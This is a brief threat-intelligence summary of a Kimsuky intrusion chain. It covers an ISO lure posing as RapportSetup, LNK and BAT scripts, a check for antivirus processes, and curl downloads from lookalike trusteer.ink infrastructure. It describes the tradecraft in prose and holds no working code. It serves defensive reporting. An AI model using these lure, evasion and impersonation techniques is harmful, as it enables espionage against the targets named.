SecAI analyzed a Kimsuky ISO lure that masqueraded as RapportSetup and executed a malicious LNK and BAT script while also launching IBM Trusteer-branded legitimate software as cover. The BAT script checked for Avast and Kaspersky processes, then used curl to download follow-on content from trusteer.ink URLs, including a macro-associated payload path and C2 infrastructure that mimicked IBM Trusteer. The source links the sample to Kimsuky activity seen in 2024 against South Korean and allied targets, including embassy, construction, and university-themed lures used for information theft and remote control.